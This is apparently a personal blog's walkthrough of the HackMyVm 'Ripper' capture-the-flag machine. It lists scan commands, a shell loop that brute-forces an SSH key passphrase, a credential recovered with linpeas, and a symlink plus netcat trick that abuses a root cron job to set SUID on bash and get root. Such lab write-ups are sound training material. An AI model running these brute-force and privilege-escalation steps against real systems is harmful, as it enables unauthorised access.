Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Ripper Walkthrough

HackMyVm Ripper Walkthrough

Scan ports.

 nmap -sV -sC -p-  -oN ports.log
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.

 cat staff_statements.txt   
 The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

Take care the screen of VM told us the user name jack.


Download id_rsa.bak, try to connect ssh, it's encrypted.

 2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]
 ssh jack@ -i id_rsa.bak
 Enter passphrase for key 'id_rsa.bak':

Use following code to brute force password.

 cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done

Login as jack. After some enum, found nothing useful.

Download linpeas from github. Upload to VM.


Run, get a strange string.

 [+] Hashes inside passwd file? ........... No                                                                                        
 [+] Writable passwd file? ................ No
 [+] Credentials in fstab/mtab? ........... No
 [+] Can I read shadow files? ............. No
 [+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
 [+] Can I write in network-scripts? ...... No
 [+] Can I read root folder? .............. No

It's the password of another user helder.

Download pspy64 from github(, upload to VM, check system process.

 2021/06/02 08:22:01 CMD: UID=0    PID=1205   | /usr/sbin/CRON -f 
 2021/06/02 08:22:01 CMD: UID=0    PID=1206   | /usr/sbin/CRON -f
 2021/06/02 08:22:01 CMD: UID=0    PID=1207   | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.

So we make a symbolic link, and send port 10000 string "bash". After a minute, /usr/bin/bash has been set SUID.

 helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
 helder@ripper:~$echo bash |nc -nlvp 10000
 listening on [any] 10000 ...
 connect to [] from (UNKNOWN) [] 43374
 helder@ripper:~$ls -la /usr/bin/bash
 -rwsr-sr-x 1 root root 1168776 Apr 18  2019 /usr/bin/bash

Get root finally.

 helder@ripper:~$/usr/bin/bash -p
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)



Powered By Z-BlogPHP 1.7.0